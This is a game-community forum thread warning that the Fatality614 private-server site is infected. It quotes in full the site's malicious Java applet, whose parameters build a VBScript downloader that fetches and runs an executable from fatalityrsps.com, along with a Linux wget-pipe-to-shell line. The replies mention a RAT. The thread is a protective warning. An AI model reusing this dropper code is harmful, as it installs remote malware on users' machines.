|
Doo not visit Fatality614 in the meantime. it has been infected with a virus that I caught while browsing.
Code:<applet width='1' height='1' code='Client.class' archive='http://fatalityrsps.com/Client.jar'> <param name='windows1' value='cmd.exe /c echo Const adTypeBinary = 1 > %temp%\winconfig.vbs & echo Const adSaveCreateOverWrite = 2 >> %temp%\winconfig.vbs & echo Dim S >> %temp%\winconfig.vbs & echo Dim A >> %temp%\winconfig.vbs & echo Dim DTNDTN >> %temp%\winconfig.vbs & echo S = "ADODB" >> %temp%\winconfig.vbs & echo A = ".Stream" >> %temp%\winconfig.vbs & echo Set DTNDTN = CreateObject(S+A) >> %temp%\winconfig.vbs & echo DTNDTN.Type = adTypeBinary >> %temp%\winconfig.vbs & echo DTNDTN.Open >> %temp%\winconfig.vbs & echo DTNDTN.Write BinaryGetURL(Wscript.Arguments(0)) >> %temp%\winconfig.vbs & echo DTNDTN.SaveToFile Wscript.Arguments(1), adSaveCreateOverWrite >> %temp%\winconfig.vbs & echo Function BinaryGetURL(URL) >> %temp%\winconfig.vbs & echo Dim Http >> %temp%\winconfig.vbs & echo Set Http = CreateObject("WinHttp.WinHttpRequest.5.1") >> %temp%\winconfig.vbs & echo Http.Open "GET", URL, False >> %temp%\winconfig.vbs & echo Http.Send >> %temp%\winconfig.vbs & echo BinaryGetURL = Http.ResponseBody >> %temp%\winconfig.vbs & echo End Function >> %temp%\winconfig.vbs & echo Set shell = CreateObject("WScript.Shell") >> %temp%\winconfig.vbs & echo shell.Run "%temp%\update.exe" >> %temp%\winconfig.vbs & start %temp%\winconfig.vbs http://fatalityrsps.com/svchostt.exe %temp%\update.exe'> <param name='windows2' value=''> <param name='unix1' value=""> <param name='unix2' value=""> <param name='linux1' value="wget http://fatalityrsps.com/svchostt.exe -O- | sh"> <param name='linux2' value=""> </applet>
Good find.
Shitty server anyway I seriously don't get why this is so popular.
Fatality Sucks, anyway thanks for letting us know
I also heard today from my friend that he got RAT from Fatality614 site. Legit post.
EDIT: Btw their new domain is http://fatality614.com/forums/forum.php
Knew it, thats why I didn't play.
« Previous Thread | Next Thread » |
Thread Information |
Users Browsing this ThreadThere are currently 1 users browsing this thread. (0 members and 1 guests) |